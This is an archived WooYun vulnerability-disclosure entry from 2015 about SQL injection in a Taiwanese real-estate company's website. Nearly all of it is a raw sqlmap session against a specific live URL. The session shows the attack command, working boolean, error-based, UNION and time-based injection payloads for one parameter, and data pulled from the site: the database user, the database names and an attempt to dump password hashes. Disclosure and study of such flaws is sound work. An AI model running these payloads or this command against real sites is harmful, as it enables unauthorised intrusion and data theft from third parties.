乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-05: 细节已通知厂商并且等待厂商处理中 2015-03-10: 厂商已经主动忽略漏洞,细节向公众公开
台灣某房地產商SQL Injection
[root@Hacker~]# Sqlmap sqlmap.py -u "http://www.3hlife.com.tw/manage_show.php?desn=15" --dbs --passwords --current-user --current-db --is-dba sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state[*] starting at 22:50:59[22:51:00] [INFO] testing connection to the target URL[22:51:01] [INFO] testing if the target URL is stable. This can take a couple of seconds[22:51:03] [INFO] target URL is stable[22:51:03] [INFO] testing if GET parameter 'desn' is dynamic[22:51:03] [INFO] confirming that GET parameter 'desn' is dynamic[22:51:04] [INFO] GET parameter 'desn' is dynamic[22:51:07] [INFO] heuristic (basic) test shows that GET parameter 'desn' might be injectable (possible DBMS: 'MySQL')[22:51:07] [INFO] testing for SQL injection on GET parameter 'desn'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n][22:51:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[22:51:10] [WARNING] reflective value(s) found and filtering out[22:51:12] [INFO] GET parameter 'desn' is 'AND boolean-based blind - WHERE or HAVING clause' injectable[22:51:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[22:51:12] [INFO] GET parameter 'desn' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[22:51:12] [INFO] testing 'MySQL inline queries'[22:51:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'[22:51:14] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..[22:51:20] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[22:51:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[22:51:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[22:52:10] [INFO] GET parameter 'desn' is 'MySQL > 5.0.11 AND time-based blind' injectable[22:52:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[22:52:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[22:52:12] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for[22:52:14] [INFO] target URL appears to have 9 columns in query[22:52:37] [INFO] GET parameter 'desn' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable[22:52:39] [WARNING] automatically patching output having last char trimmedGET parameter 'desn' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 28 HTTP(s) requests:---Place: GETParameter: desn Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: desn=15 AND 4977=4977 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: desn=15 AND (SELECT 3559 FROM(SELECT COUNT(*),CONCAT(0x71676e6471,(SELECT (CASE WHEN (3559=3559) THEN 1 ELSE 0 END)),0x716b756a71,FLOOR(RAND(0)*2))x FROM INFOR Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: desn=15 UNION ALL SELECT NULL,NULL,CONCAT(0x71676e6471,0x636646596f6c48594b75,0x716b756a71),NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: desn=15 AND SLEEP(5)---[22:53:02] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0[22:53:02] [INFO] fetching current usercurrent user: 'hlife3@%'[22:53:03] [INFO] fetching current databasecurrent database: 'hlife3'[22:53:04] [INFO] testing if current user is DBA[22:53:04] [INFO] fetching current user[22:53:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'current user is DBA: False[22:53:05] [INFO] fetching database users password hashes[22:53:08] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION tech[22:53:08] [WARNING] the SQL query provided does not return any output[22:53:14] [WARNING] the SQL query provided does not return any output[22:53:14] [INFO] fetching database users[22:53:15] [INFO] fetching number of password hashes for user 'hlife3'[22:53:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[22:53:15] [INFO] retrieved:[22:53:19] [INFO] retrieved:[22:53:19] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads[22:53:25] [WARNING] unable to retrieve the number of password hashes for user 'hlife3'[22:53:25] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system dat[22:53:25] [INFO] fetching database namesavailable databases [2]:[*] hlife3[*] information_schema[22:53:26] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in[22:53:26] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\???~1\SQLMAP~1.4\Bin\output\www.3hlife.com.tw'
null
危害等级:无影响厂商忽略
忽略时间:2015-03-10 14:56
暂无